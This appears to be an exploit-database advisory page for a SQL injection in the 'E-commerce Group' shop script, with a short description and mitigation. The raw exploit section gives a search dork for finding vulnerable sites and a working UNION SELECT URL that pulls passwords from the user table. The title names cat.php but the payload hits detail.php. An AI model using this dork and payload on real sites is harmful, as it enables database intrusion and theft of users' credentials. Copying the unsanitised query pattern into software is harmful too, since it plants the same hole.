E-commerce Group (cat.php) SQL Injection Vulnerability

vendor:

E-commerce Group

by:

BLack Revenge

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-commerce Group

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

E-commerce Group (cat.php) SQL Injection Vulnerability

A vulnerability has been discovered in E-commerce Group (cat.php) which allows an attacker to inject malicious SQL commands into the vulnerable application. The vulnerability is due to the user input not being properly sanitized before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can exploit this vulnerability to gain access to sensitive information from the database, modify data, or execute system commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

Exploit Title: E-commerce Group (cat.php) SQL Injection Vulnerability
# Date: 2010/05/21
# Author:BLack Revenge
# Software Link:
# Version:
# Tested on:
# CVE :
==============================
[#]E-commerce Group (cat.php) SQL Injection Vulnerability
[#]Founder: BLaCk RevenGe
Email:- ahmed.h4ck3r@gmail.com
WwW.AraB-ExplOiT.CoM[#]
AraB Expl0iT Cr3w
-----------------------------------------------------------
==============================
Dork :Designed and Developed by karkia <http://www.karkia.org/> E-commerce
Group. Copyright 2007

SQL Injection
http://www.Site.com/path/detail.php?id=1 -->SQL Injection

Demo:-
Password Injection #

http://www.localhost.com/shop/detail.php?id=-647+union+select+1,2,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user
----------------------------